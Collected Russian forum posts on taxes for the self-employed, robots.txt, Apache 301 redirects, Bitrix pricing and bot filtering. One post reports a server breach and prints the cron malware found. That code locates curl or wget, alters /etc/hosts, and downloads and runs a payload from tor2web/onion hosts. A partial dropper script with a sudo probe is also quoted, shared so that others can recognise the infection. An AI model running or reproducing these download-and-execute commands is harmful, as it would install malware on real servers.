Diman777

Вы сами себе противоречите.

Если не отдать в пенсионный фонд и копить то получится тоже самое.

На мой взгляд самозанятный меньше гемороя имеет чем ИП и темболее ООО.

Не пробовали посчитать если зарегистрироваться не как ИП, а как "Самозанятый"?

Sitemap и robots.txt не обязательно делать

карта сайта Sitemap служит для того, чтобы ПС было легче индексировать сайт, у вас 5 страниц и карта сайта вам явно не нужна.

Файл robots.txt нужен для ПС это правила для них но этот файл они могут игнорировать и сканировать то что запрещено но в поиск попасть не должно. robots.txt может помочь вам убрать дубли страниц если они у вас появляются к примеру ваш-сайт.ру/?любое значение открывается у вас на сайте не отдаёт ответ сервера 404 или 301 и нет тега каноникал, тогда у вас появятся дубли, так как один и тот же контент будет по разным адресам.

Улучшайте вашу компанию и будут отзывы хорошие, если можно было удалять любые отрицательные отзывы тогда нафиг они вообще нужны на них обращать внимание потом не будут.

10 июня примерно в 2.52 по мск один мой сервер был взломан данным способом скрин 1 https://prnt.sc/nzqmhf скрин 2 https://prnt.sc/nzq1ta

Заметил, что сайт упал 502 ошибкой начал смотреть заметил потухшие службы (скрин 2) в процессах висело такое

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND

10543 root      20   0  430524   7636    652 S 399.3  0.0 256:26.18 [kthrotlds]

   42 root      rt   0       0      0      0 S   0.3  0.0   0:00.01 watchdog/7

29601 mysql     20   0 2281312 274392   5496 S   0.3  0.4   0:00.28 mysqld

в кроне такой код был

tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt) && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt

В данный момент собираю новый сервер на старом пока сайт висит с обрубленным кроном, что именно успели сделать пока выясняю и не лечил

wget http://lechillka.firstvds.ru/exim_rce_fixer.sh && chmod +x exim_rce_fixer.sh && ./exim_rce_fixer.sh

и не уверен что всё вылечит решил новый сервер собрать.

В созданных файлах можно найти такой код

#!/bin/bash



SPOOLDIR=/var/spool/exim



cd $SPOOLDIR/db

for a in retry misc wait-* callout ratelimit; do

    [ -r "$a" ] || continue

    [ "${a%%.lockfile}" = "$a" ] || continue

    /usr/sbin/exim_tidydb $SPOOLDIR $a >/dev/null

done

или такой

#!/bin/sh

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

RHOST="https://an7kmd2wp4xo7hpr"

TOR1=".tor2web.su/"

TOR2=".tor2web.io/"

TOR3=".onion.sh/"

RPATH1='src/ldm'

#LPATH="${HOME-/tmp}/.cache/"

TIMEOUT="75"

CTIMEOUT="22"

COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "

WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "

tbin=$(command -v passwd); bpath=$(dirname "${tbin}")

curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi

wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi

#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '

CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '

LBIN8="kthrotlds"

null=' >/dev/null 2>&1'

sudoer=1

sudo=''

if [ "$(whoami)" != "root" ]; then

    sudo="sudo "

    timeout 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; }

.................Не помещается ))...............

Может кому пригодится.

А где вы смотрте, что не работает в логах видите подключение?

В логах будет запись но смотрите код ответа сервера, если блокировка должно 403 код выдать если не ошибаюсь.

Владимир-C, Можете ещё для пущей уверенности записать правило в robots.txt

Disallow: */?fbclid=*

Вам не надо столько редиректа вам нужен абсолютный редирект без разницы какой протокол и с www или без www.

Если у вас веб сервер Apache то в файл .htaccess в директории старого доменного имени достаточно такое прописать если я не ошибаюсь так как не проверял этот код и у разных хостинг провайдеров может по разному работать но суть думаю ясна.

RewriteEngine On

RewriteCond %{HTTP_HOST} old-site.ru

RewriteRule (.*) https://new-site.ru/$1 [R=301,L]

И не забываем что кириллический домен нужно в пуникоде писать.

И при всех ваших обращения к старому сайту будет редирект 301 на новый с протоколом SSL https://, а на новом у вас уже должно быть настроено перенапровлять с http:// на https:// и с www или без www или наоборот но это другой код который будет только для нового доменного имени и естественно в файле .htaccess нового доменного имени и всё у вас буде в порядке.

На мой взгляд для вас лучшим решением останется Битрикс управление сайтом малый бизнес.

Лицензия вы говорите у вас есть, для интернет-магазина лучше всего подойдёт малый бизнес, а у вас какая?

Вы уже знакомы с битриксром хоть и не с интернет магазином но вы уже хорошо понимаете, что где в админке и на сайте может быть и как с этим работать в интернет-магазине у вас добавится инфоблок каталога и возможность будет ещё новостные, блоговые и форумный + для отзывов и т.п.

120000 т.р. это средняя цена по битриксу и интернет-магазин за создание на мой взгляд завышена но битрикс этим и известен, что каждый пытается заработать на этом, так как большинство кто заказывает интернет-магазин чаще всего знает 1с и слышит битрикс но в душе не понимает что это такое и с чем его едят)) и ему начинают рассказывать одно то другое в котором он не особо понимает и разводят на приличные деньги.

На самом деле система неплохая и на мой взгляд имеет ряд преимуществ перед всеми остальными на фоне глобальных событий в мире, разработчик и техническая часть поддерживается русскоговорящими людьми и в большинстве случаев всю вашу работу по интернет-магазину вы официально можете оформить от разработки сайта до продаж с самого сайта.

Но это всё стоит денег и если серьёзно подходить к бизнесу в интернете битрикс на самом деле не так дорого будет обходится по сравнению с бесплатными или условно бесплатными CMS.

Каждая CMS имеет свои минусы и плюсы я не буду много писать об этом но могу выделить некоторое:

С бесплатными или условно бесплатными скорее всего вам придётся сталкиваться, с тем, что вы не сможете реализовать, что-то задуманное без какого либо плагина, модуля или добавить какой то код без оплаты программисту или покупкой к примеру версии PRO какого нибудь плагина, а также большинство разработчиков бесплатных CMS это зарубежные компании или сообщества. Также хочу отметить, что в плане безопасности CMS битрикс имеет лучшую защиту, хотя во многом зависит не только от CMS, а самого сервера и системного администратора. И чаще всего пытаются взломать бесплатные CMS так как их огромное количество и если вы понаблюдаете за логами сайта то там постоянно можно видеть как различные боты сканируют сеть на ту или иную уязвимость и ищут различные файлы по которым определяют CMS и после пытаются, что нибудь залить по известной бреши в безопасности.

И после того как вам, что то зальют на работающем сайте и который вы развиваете и вложили много сил я уверен вы заплатите ещё больше, чем когда думали платить 120000р. за установку CMS

Установить стоит не более 1 часа работы программиста, а качественно настроить и оформить это может стоит гораздо больше.

Я думаю вам нужно найти хорошего человека который вам поможет собрать и за меньшие деньги и такие люди я уверен есть.

К примеру я примерно прикидывал во сколько обходится содержание интернет-магазина на битрике в год, это около 80000р. Но эта сумма может сильно отличаться от поставленных задач для сайта.

В вашей теме много есть хороших ответов на ваш вопрос, подумайте хорошо и естественно решать придётся только вам.

Спасибо за внимание 🍿

Я думаю вам пришло уведомление «При обращении к серверу среднее время ответа превышает 3 секунды. Долгая загрузка страниц затрудняет работу с сайтом» потому что у вас задержка была на 5 сек. и бот просто постоянно задерживало. Ответ сервера я думаю тут не причём он может быстро ответить на запрос к нему, а доступ он может предоставить или нет уже после того как ответил на запрос, бот делает запрос на сервер тот ему отвечает 403 доступ закрыт, бот ему опять запрос сервер ему опять 403 и до тех пор пока пройдёт 5 сек, а как известно за 5 секунд может быть много запросов сделано.

Сloudflare я не когда не пользовался, а привык на своей стороне выстраивать минимальную защиту от Ддос атак средствами и возможностями сервера.

То что при проверке сервисами вам выдаёт 403 ошибку я могу предположить, что доступ закрыт так как все эти сервисы тоже при проверки дают нагрузку, а вы и так под нагрузкой и трафик фильтруется и трафик с сервисов их ботов фильтрует с кодом ответа 403 это правильный ответ при этой ситуации.